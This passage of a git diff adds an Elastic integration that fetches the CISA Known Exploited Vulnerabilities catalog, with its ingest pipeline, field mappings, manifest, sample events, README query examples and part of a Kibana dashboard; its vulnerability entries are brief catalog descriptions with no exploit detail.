"2024-02-15", + "due_date": "2024-03-07", + "known_ransomware_campaign_use": "Known", + "name": "Cisco ASA and FTD Information Disclosure Vulnerability", + "notes": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB", + "product": "Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)", + "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.", + "vendor_project": "Cisco" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "vulnerability" + ], + "kind": "enrichment", + "original": "{\"cveID\":\"CVE-2020-3259\",\"vendorProject\":\"Cisco\",\"product\":\"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\",\"vulnerabilityName\":\"Cisco ASA and FTD Information Disclosure Vulnerability\",\"dateAdded\":\"2024-02-15\",\"shortDescription\":\"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB\"}", + "type": [ + "info" + ] + }, + "tags": [ + "preserve_original_event" + ], + "vulnerability": { + "description": "Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.", + "id": "CVE-2020-3259" + } + }, + { + "@timestamp": "2024-02-15T00:00:00.000Z", + "cisa_kev": { + "vulnerability": { + "date_added": "2024-02-15", + "due_date": "2024-03-07", + "known_ransomware_campaign_use": "Unknown", + "name": "Microsoft Exchange Server Privilege Escalation Vulnerability", + "notes": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410", + "product": "Exchange Server", + "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.", + "vendor_project": "Microsoft" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "vulnerability" + ], + "kind": "enrichment", + "original": "{\"cveID\":\"CVE-2024-21410\",\"vendorProject\":\"Microsoft\",\"product\":\"Exchange Server\",\"vulnerabilityName\":\"Microsoft Exchange Server Privilege Escalation Vulnerability\",\"dateAdded\":\"2024-02-15\",\"shortDescription\":\"Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Unknown\",\"notes\":\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21410\"}", + "type": [ + "info" + ] + }, + "tags": [ + "preserve_original_event" + ], + "vulnerability": { + "description": "Microsoft Exchange Server contains an unspecified vulnerability that allows for privilege escalation.", + "id": "CVE-2024-21410" + } + }, + { + "@timestamp": "2024-02-22T00:00:00.000Z", + "cisa_kev": { + "vulnerability": { + "date_added": "2024-02-22", + "due_date": "2024-02-29", + "known_ransomware_campaign_use": "Known", + "name": "ConnectWise ScreenConnect Authentication Bypass Vulnerability", + "notes": "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8", + "product": "ScreenConnect", + "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.", + "vendor_project": "ConnectWise" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "vulnerability" + ], + "kind": "enrichment", + "original": "{\"cveID\":\"CVE-2024-1709\",\"vendorProject\":\"ConnectWise\",\"product\":\"ScreenConnect\",\"vulnerabilityName\":\"ConnectWise ScreenConnect Authentication Bypass Vulnerability\",\"dateAdded\":\"2024-02-22\",\"shortDescription\":\"ConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, administrator-level account on affected devices.\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"dueDate\":\"2024-02-29\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8\"}", + "type": [ + "info" + ] + }, + "tags": [ + "preserve_original_event" + ], + "vulnerability": { + "description": "ConnectWise ScreenConnect contains an authentication bypass vulnerability that allows an attacker with network access to the management interface to create a new, administrator-level account on affected devices.", + "id": "CVE-2024-1709" + } + } + ] +} \ No newline at end of file diff --git a/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-common-config.yml b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/cisa_kevs/data_stream/vulnerability/_dev/test/system/test-default-config.yml b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..7608bf4dee4 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/_dev/test/system/test-default-config.yml @@ -0,0 +1,7 @@ +input: httpjson +service: cisakev +data_stream: + vars: + url: http://{{Hostname}}:{{Port}}/sites/default/files/feeds/known_exploited_vulnerabilities.json + preserve_original_event: true + enable_request_tracer: true diff --git a/packages/cisa_kevs/data_stream/vulnerability/agent/stream/httpjson.yml.hbs b/packages/cisa_kevs/data_stream/vulnerability/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..35ba1467932 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/agent/stream/httpjson.yml.hbs @@ -0,0 +1,42 @@ +config_version: "2" +interval: {{interval}} +request.method: "GET" +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +request.tracer.maxbackups: 5 +{{/if}} + +{{#if url}} +request.url: {{url}} +{{/if}} +{{#if proxy_url }} +request.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +request.transforms: +- set: + target: header.Content-Type + value: application/json + +response.split: + target: body.vulnerabilities + +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag i|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/cisa_kevs/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml b/packages/cisa_kevs/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..4a47dd9e240 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,137 @@ +--- +description: Pipeline for parsing the CISA KEV Catalog +processors: + #################### + # Event ECS fields # + #################### + - set: + field: ecs.version + value: '8.11.0' + - set: + field: event.kind + value: enrichment + - set: + field: event.category + value: [vulnerability] + - set: + field: event.type + value: [info] + ###################### + # General ECS fields # + ###################### + - rename: + field: message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - json: + field: event.original + target_field: cisa_kev + - fingerprint: + fields: + - cisa_kev.cveID + target_field: "_id" + - date: + field: cisa_kev.dateAdded + formats: + - "yyyy-MM-dd" + tag: "cisa_added_date" + on_failure: + - remove: + field: cisa_kev.dateAdded + ignore_failure: true + - append: + field: error.message + value: "fail-{{{ _ingest.on_failure_processor_tag }}}" + - fail: + message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + + ##################### + # Vulnerability ECS Fields # + ##################### + - rename: + field: cisa_kev.cveID + target_field: vulnerability.id + ignore_missing: true + - rename: + field: cisa_kev.shortDescription + target_field: vulnerability.description + ignore_missing: true + + ##################### + # CISA KEV Custom Fields # + ##################### + - rename: + field: cisa_kev.product + target_field: cisa_kev.vulnerability.product + ignore_missing: true + - rename: + field: cisa_kev.vulnerabilityName + target_field: cisa_kev.vulnerability.name + ignore_missing: true + - rename: + field: cisa_kev.notes + target_field: cisa_kev.vulnerability.notes + ignore_missing: true + - rename: + field: cisa_kev.dueDate + target_field: cisa_kev.vulnerability.due_date + ignore_missing: true + - rename: + field: cisa_kev.vendorProject + target_field: cisa_kev.vulnerability.vendor_project + ignore_missing: true + - rename: + field: cisa_kev.knownRansomwareCampaignUse + target_field: cisa_kev.vulnerability.known_ransomware_campaign_use + ignore_missing: true + - rename: + field: cisa_kev.requiredAction + target_field: cisa_kev.vulnerability.required_action + ignore_missing: true + - rename: + field: cisa_kev.dateAdded + target_field: cisa_kev.vulnerability.date_added + ignore_missing: true + + ###################### + # Cleanup processors # + ###################### + + - remove: + field: event.original + if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_failure: true + ignore_missing: true + - script: + description: Remove null/empty values recursively. + lang: painless + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + tag: 'Remove null/empty values recursively.' + on_failure: + - append: + field: error.message + value: "fail-{{{ _ingest.on_failure_processor_tag }}}" + - fail: + message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/cisa_kevs/data_stream/vulnerability/fields/base-fields.yml b/packages/cisa_kevs/data_stream/vulnerability/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/cisa_kevs/data_stream/vulnerability/fields/beats.yml b/packages/cisa_kevs/data_stream/vulnerability/fields/beats.yml new file mode 100644 index 00000000000..3c48f1f224f --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/fields/beats.yml @@ -0,0 +1,3 @@ +- name: input.type + type: keyword + description: Type of Filebeat input. diff --git a/packages/cisa_kevs/data_stream/vulnerability/fields/ecs.yml b/packages/cisa_kevs/data_stream/vulnerability/fields/ecs.yml new file mode 100644 index 00000000000..c8f59ebea1b --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/fields/ecs.yml @@ -0,0 +1,24 @@ +- external: ecs + name: ecs.version +- external: ecs + name: message +- external: ecs + name: error.message +- external: ecs + name: tags +- external: ecs + name: event.ingested +- external: ecs + name: event.kind +- external: ecs + name: event.category +- external: ecs + name: event.type +- external: ecs + name: event.created +- external: ecs + name: event.original +- external: ecs + name: vulnerability.id +- external: ecs + name: vulnerability.description diff --git a/packages/cisa_kevs/data_stream/vulnerability/fields/fields.yml b/packages/cisa_kevs/data_stream/vulnerability/fields/fields.yml new file mode 100644 index 00000000000..4400eeb0e43 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/fields/fields.yml @@ -0,0 +1,44 @@ +- name: cisa_kev.vulnerability + type: group + description: All fields related to the CISA Known Exploited Vulnerabilities. + fields: + - name: vendor_project + type: keyword + description: > + The vendor or project name for the vulnerability + + - name: product + type: keyword + description: > + The vulnerability product + + - name: name + type: keyword + description: > + The name of the vulnerability + + - name: date_added + type: date + description: > + The date the vulnerability was added to the catalog in the format YYYY-MM-DD + + - name: required_action + type: keyword + description: > + The required action to address the vulnerability + + - name: due_date + type: date + description: > + The date the required action is due in the format YYYY-MM-DD + + - name: known_ransomware_campaign_use + type: keyword + description: > + 'Known' if this vulnerability is known to have been leveraged as part of a ransomware campaign; 'Unknown' if CISA lacks confirmation that the vulnerability has been utilized for ransomware + + - name: notes + type: keyword + description: > + Any additional notes about the vulnerability + diff --git a/packages/cisa_kevs/data_stream/vulnerability/manifest.yml b/packages/cisa_kevs/data_stream/vulnerability/manifest.yml new file mode 100644 index 00000000000..f0ff1745714 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/manifest.yml @@ -0,0 +1,69 @@ +title: "CISA Known Exploited Vulnerabilities List" +type: logs +streams: + - input: httpjson + vars: + - name: url + type: text + title: CISA KEV URL Catalog API endpoint + multi: false + required: true + show_user: false + default: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: false + default: 30s + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: interval + type: text + title: Interval + multi: false + required: true + show_user: true + default: 60m + - name: ssl + type: yaml + title: SSL + multi: false + required: false + show_user: false + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - cisa-kev + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: > + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + + template_path: httpjson.yml.hbs + title: CISA KEV Catalog logs + description: Collect CISA Known Exploited Vulnerability logs diff --git a/packages/cisa_kevs/data_stream/vulnerability/sample_event.json b/packages/cisa_kevs/data_stream/vulnerability/sample_event.json new file mode 100644 index 00000000000..f43c76a06c6 --- /dev/null +++ b/packages/cisa_kevs/data_stream/vulnerability/sample_event.json @@ -0,0 +1,61 @@ +{ + "@timestamp": "2024-02-15T00:00:00.000Z", + "agent": { + "ephemeral_id": "39957f93-aff4-4e3f-84f0-66d18441ccd6", + "id": "7edf8be5-ad5d-4c57-a6bd-b86bddc66601", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.2" + }, + "cisa_kev": { + "vulnerability": { + "date_added": "2024-02-15", + "due_date": "2024-03-07", + "known_ransomware_campaign_use": "Known", + "name": "Cisco ASA and FTD Information Disclosure Vulnerability", + "notes": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB", + "product": "Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)", + "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.", + "vendor_project": "Cisco" + } + }, + "data_stream": { + "dataset": "cisa_kevs.vulnerability", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "7edf8be5-ad5d-4c57-a6bd-b86bddc66601", + "snapshot": false, + "version": "8.12.2" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "vulnerability" + ], + "created": "2024-03-13T01:01:09.893Z", + "dataset": "cisa_kevs.vulnerability", + "ingested": "2024-03-13T01:01:21Z", + "kind": "enrichment", + "original": "{\"cveID\":\"CVE-2020-3259\",\"dateAdded\":\"2024-02-15\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB\",\"product\":\"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"shortDescription\":\"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.\",\"vendorProject\":\"Cisco\",\"vulnerabilityName\":\"Cisco ASA and FTD Information Disclosure Vulnerability\"}", + "type": [ + "info" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "cisa-kev" + ], + "vulnerability": { + "description": "Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.", + "id": "CVE-2020-3259" + } +} \ No newline at end of file diff --git a/packages/cisa_kevs/docs/README.md b/packages/cisa_kevs/docs/README.md new file mode 100644 index 00000000000..662f82be7aa --- /dev/null +++ b/packages/cisa_kevs/docs/README.md @@ -0,0 +1,141 @@ +# CISA KEV integration + +This integration is for [CISA KEV](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) logs. This data can be useful for current awareness of Known Exploited Vulnerabilities according to CISA and also for enriching other vulnerability scan data in the Elastic stack. The integration periodically checks for the latest CISA KEV list. It includes the following datasets for retrieving logs from the CISA KEV website: + +- `vulnerability` dataset: Supports vulnerabilities classified as known exploited from CISA. + +### Example Enrich Policy and ES|QL Correlation Query + +An enrich policy can be created to have other vulnerability information be enriched based on the CVE number. + +The following requests can be used to create and execute the enrich policy after the integration has been installed: + +``` +PUT /_enrich/policy/enrich_cve_with_context_cisa_kev +{ + "match": { + "indices": ".ds-logs-cisa_kevs.vulnerability-*", + "match_field": "vulnerability.id", + "enrich_fields": ["cisa_kev.vulnerability.date_added", "cisa_kev.vulnerability.due_date", "cisa_kev.vulnerability.known_ransomware_campaign_use", "cisa_kev.vulnerability.name", "cisa_kev.vulnerability.notes","cisa_kev.vulnerability.product","cisa_kev.vulnerability.required_action","cisa_kev.vulnerability.vendor_project"] + } +} + +PUT /_enrich/policy/enrich_cve_with_context_cisa_kev/_execute +``` + +Here is an example ES|QL query that uses the index pattern of logs-nessus.vulnerability* to enrich the data source with CISA KEV information and keeping the top 10 results. Note, the enrich policy (shown above) must be created first: + +``` +from logs-nessus.vulnerability* +| where vulnerability.id IS NOT NULL +| keep vulnerability.*, nessus.plugin.name, host.name +| enrich enrich_cve_with_context_cisa_kev with cisa_kev.vulnerability.due_date, cisa_kev.vulnerability.known_ransomware_campaign_use, cisa_kev.vulnerability.name, cisa_kev.vulnerability.notes, cisa_kev.vulnerability.product, cisa_kev.vulnerability.required_action, cisa_kev.vulnerability.vendor_project, cisa_kev.vulnerability.date_added +| where cisa_kev.vulnerability.name IS NOT NULL +| stats count = COUNT(host.name) BY nessus.plugin.name, vulnerability.severity, cisa_kev.vulnerability.date_added, cisa_kev.vulnerability.product +| sort count desc +| keep nessus.plugin.name, vulnerability.severity, cisa_kev.vulnerability.product, cisa_kev.vulnerability.date_added, count +| limit 10 +``` + +## Logs + +### Vulnerabilities + +The CISA KEV data_stream retrieves vulnerability information from the endpoint `https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json`. + +An example event for `vulnerability` looks as following: + +```json +{ + "@timestamp": "2024-02-15T00:00:00.000Z", + "agent": { + "ephemeral_id": "39957f93-aff4-4e3f-84f0-66d18441ccd6", + "id": "7edf8be5-ad5d-4c57-a6bd-b86bddc66601", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.2" + }, + "cisa_kev": { + "vulnerability": { + "date_added": "2024-02-15", + "due_date": "2024-03-07", + "known_ransomware_campaign_use": "Known", + "name": "Cisco ASA and FTD Information Disclosure Vulnerability", + "notes": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB", + "product": "Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)", + "required_action": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.", + "vendor_project": "Cisco" + } + }, + "data_stream": { + "dataset": "cisa_kevs.vulnerability", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "7edf8be5-ad5d-4c57-a6bd-b86bddc66601", + "snapshot": false, + "version": "8.12.2" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "vulnerability" + ], + "created": "2024-03-13T01:01:09.893Z", + "dataset": "cisa_kevs.vulnerability", + "ingested": "2024-03-13T01:01:21Z", + "kind": "enrichment", + "original": "{\"cveID\":\"CVE-2020-3259\",\"dateAdded\":\"2024-02-15\",\"dueDate\":\"2024-03-07\",\"knownRansomwareCampaignUse\":\"Known\",\"notes\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-info-disclose-9eJtycMB\",\"product\":\"Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)\",\"requiredAction\":\"Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\",\"shortDescription\":\"Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.\",\"vendorProject\":\"Cisco\",\"vulnerabilityName\":\"Cisco ASA and FTD Information Disclosure Vulnerability\"}", + "type": [ + "info" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "cisa-kev" + ], + "vulnerability": { + "description": "Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an information disclosure vulnerability. An attacker could retrieve memory contents on an affected device, which could lead to the disclosure of confidential information due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. This vulnerability affects only specific AnyConnect and WebVPN configurations.", + "id": "CVE-2020-3259" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| cisa_kev.vulnerability.date_added | The date the vulnerability was added to the catalog in the format YYYY-MM-DD | date | +| cisa_kev.vulnerability.due_date | The date the required action is due in the format YYYY-MM-DD | date | +| cisa_kev.vulnerability.known_ransomware_campaign_use | 'Known' if this vulnerability is known to have been leveraged as part of a ransomware campaign; 'Unknown' if CISA lacks confirmation that the vulnerability has been utilized for ransomware | keyword | +| cisa_kev.vulnerability.name | The name of the vulnerability | keyword | +| cisa_kev.vulnerability.notes | Any additional notes about the vulnerability | keyword | +| cisa_kev.vulnerability.product | The vulnerability product | keyword | +| cisa_kev.vulnerability.required_action | The required action to address the vulnerability | keyword | +| cisa_kev.vulnerability.vendor_project | The vendor or project name for the vulnerability | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | match_only_text | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.created | `event.created` contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from `@timestamp` in that `@timestamp` typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, `@timestamp` should be used. | date | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.kind | This is one of four ECS Categorization Fields, and indicates the highest level in the ECS category hierarchy. `event.kind` gives high-level information about what type of information the event contains, without being specific to the contents of the event. For example, values of this field distinguish alert events from metric events. The value of this field can be used to inform how these kinds of events should be handled. They may warrant different retention, different access control, it may also help understand whether the data is coming in at a regular interval or not. | keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | +| input.type | Type of Filebeat input. | keyword | +| message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | +| tags | List of keywords used to tag each event. | keyword | +| vulnerability.description | The description of the vulnerability that provides additional context of the vulnerability. For example (https://cve.mitre.org/about/faqs.html#cve_entry_descriptions_created[Common Vulnerabilities and Exposure CVE description]) | keyword | +| vulnerability.description.text | Multi-field of `vulnerability.description`. | match_only_text | +| vulnerability.id | The identification (ID) is the number portion of a vulnerability entry. It includes a unique identification number for the vulnerability. For example (https://cve.mitre.org/about/faqs.html#what_is_cve_id)[Common Vulnerabilities and Exposure CVE ID] | keyword | diff --git a/packages/cisa_kevs/img/cisa_kevs.png b/packages/cisa_kevs/img/cisa_kevs.png new file mode 100644 index 00000000000..8fa3f18b60a Binary files /dev/null and b/packages/cisa_kevs/img/cisa_kevs.png differ diff --git a/packages/cisa_kevs/img/icon.svg b/packages/cisa_kevs/img/icon.svg new file mode 100644 index 00000000000..173fdec5072 --- /dev/null +++ b/packages/cisa_kevs/img/icon.svg @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/packages/cisa_kevs/kibana/dashboard/cisa_kevs-dcb4dd40-d17a-11ee-b159-799470efb549.json b/packages/cisa_kevs/kibana/dashboard/cisa_kevs-dcb4dd40-d17a-11ee-b159-799470efb549.json new file mode 100644 index 00000000000..d433f8fdf0e --- /dev/null +++ b/packages/cisa_kevs/kibana/dashboard/cisa_kevs-dcb4dd40-d17a-11ee-b159-799470efb549.json @@ -0,0 +1,1125 @@ +{ + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-cb06c73a-039f-465e-8e15-bee3c2c1705d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "cb06c73a-039f-465e-8e15-bee3c2c1705d": { + "columnOrder": [ + "9e6568a7-fccb-4ca6-bfa2-94c00a3fdf19", + "641309f2-f117-48e9-a8da-6c5e5721e73e" + ], + "columns": { + "641309f2-f117-48e9-a8da-6c5e5721e73e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Unique Vulnerabilities", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "vulnerability.id" + }, + "9e6568a7-fccb-4ca6-bfa2-94c00a3fdf19": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Date Vulnerability Added to KEV", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "cisa_kev.vulnerability.date_added" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "event.dataset : \"cisa_kevs.vulnerability\"" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "curveType": "CURVE_MONOTONE_X", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "hideEndzones": false, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "641309f2-f117-48e9-a8da-6c5e5721e73e" + ], + "layerId": "cb06c73a-039f-465e-8e15-bee3c2c1705d", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "xAccessor": "9e6568a7-fccb-4ca6-bfa2-94c00a3fdf19", + "yConfig": [ + { + "color": "#e7664c", + "forAccessor": "641309f2-f117-48e9-a8da-6c5e5721e73e" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { 